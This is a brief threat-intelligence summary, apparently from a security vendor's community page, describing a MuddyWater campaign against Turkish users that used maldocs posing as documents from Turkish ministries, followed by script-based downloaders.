MuddyWater has conducted various campaigns against entities spread throughout the U.S.A, Europe, Middle East and South Asia. A typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like PowerShell and Visual Basic coupled with the frequent use of living-off-the-land binaries (LoLBins). Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign consists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection vector. These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health and Interior Ministries. Next, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and instrumentors for additional payloads.
Login to the community
No account yet? Create an account
LoginCUSTOMER / CYMULATE EMPLOYEE LOGIN
Enter your username or e-mail address. We'll send you an e-mail with instructions to reset your password.